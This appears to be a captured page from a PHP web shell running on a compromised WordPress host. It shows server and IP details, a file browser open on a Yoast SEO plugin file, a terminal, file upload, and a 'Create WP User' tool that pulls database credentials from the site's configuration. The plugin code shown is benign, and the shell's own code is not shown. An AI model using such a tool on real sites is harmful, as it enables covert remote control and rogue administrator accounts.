Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
www
/
wordpress
/
wpn_OciepleniaKonin
/
wp-content
/
plugins
/
wordpress-seo
/
src
/
loaders
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
oauth.php
1.17 KB
-rw-r--r--
2020-12-08 23:26
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
oauth.php
<?php /** * WPSEO plugin file. * * @package Yoast\YoastSEO\Loaders */ use Yoast\WP\SEO\Config\Dependency_Management; use Yoast\WP\SEO\Oauth\Client; use YoastSEO_Vendor\League\OAuth2\Client\Token\AccessTokenInterface; if ( ! defined( 'WPSEO_VERSION' ) ) { header( 'Status: 403 Forbidden' ); header( 'HTTP/1.1 403 Forbidden' ); exit(); } if ( file_exists( dirname( WPSEO_FILE ) . '/vendor_prefixed/guzzlehttp/guzzle/src/functions.php' ) ) { require_once dirname( WPSEO_FILE ) . '/vendor_prefixed/guzzlehttp/guzzle/src/functions.php'; } if ( file_exists( dirname( WPSEO_FILE ) . '/vendor_prefixed/guzzlehttp/psr7/src/functions.php' ) ) { require_once dirname( WPSEO_FILE ) . '/vendor_prefixed/guzzlehttp/psr7/src/functions.php'; } if ( file_exists( dirname( WPSEO_FILE ) . '/vendor_prefixed/guzzlehttp/promises/src/functions.php' ) ) { require_once dirname( WPSEO_FILE ) . '/vendor_prefixed/guzzlehttp/promises/src/functions.php'; } $yoast_seo_dependecy_management = new Dependency_Management(); $yoast_seo_dependecy_management->initialize(); class_alias( Client::class, 'WPSEO_MyYoast_Client' ); class_alias( AccessTokenInterface::class, 'WPSEO_MyYoast_AccessToken_Interface' );
关闭
保存